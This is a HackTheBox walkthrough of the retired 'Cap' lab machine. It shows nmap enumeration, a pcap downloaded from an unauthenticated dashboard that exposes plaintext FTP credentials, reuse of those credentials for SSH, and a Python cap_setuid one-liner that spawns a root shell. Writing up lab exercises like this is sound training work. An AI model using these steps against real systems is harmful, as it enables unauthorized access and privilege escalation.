HackTheBox - Cap

OS Difficulty IP Address Status
Linux Easy Retired

This box is classified as easy, but we at CovertBay decided to classify it as super easy, thanks to InfosecJack on HackTheBox. Since the web application page did not have any kind of authentication and allowed us to download packet capture files (.pcap) where when analyzed; reveals a FTP username and password which is also the credentials for SSH. Once logged in, as this box’s name suggests, the privilege escalation path is via Linux capabilities.

Phase 1 - Enumeration


As usual, we start off with a nmap to identify open ports.

21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Tue, 09 Nov 2021 19:10:40 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you 


We see three ports opened: (i) FTP (ii) SSH (iii) HTTPd (gunicorn)

Port 80

Navigating to the webpage on port 80, we right away get a dashboard, which is odd; because usually there would be a login of some kind.

enter image description here

Navigating to the sidebar of the dashboard, we notice “Security Snapshot”:

enter image description here

This /data page allows us to download packet capture files, where we can analyze network traffic through Wireshark. Playing with the ID numbers of /data, we find a pcap that’s higher in packets captured than the rest on /data/0; let’s download and analyze it.

enter image description here

Phase 2 - Exploitation

PCAP Analysis with Wireshark

Opening the packet capture file in Wireshark to analyze:

wireshark 0.pcap

Analyzing the .pcap file, we find FTP credentials:
enter image description here

username:	nathan
password:	Buck3tH4TF0RM3!

Since we know this is FTP credentials, and we have SSH running, too; let’s try it on SSH before FTP. And it works, we get in as the user nathan and get the user flag.

Phase 3 - Privilege Escalation

Linux Capabilities

Linux capabilities provide a subset of the available root privileges to a process.

So, let’s run getcap to recursively search for the capabilities we have as the user nathan:

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

We notice Python right off the bat; which means we can simply run a Python command to give us a shell:

nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@cap:~# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)

And we have rooted the box. This box maybe easy, but good practice to remember privilege escalation techniques with Linux capabilities.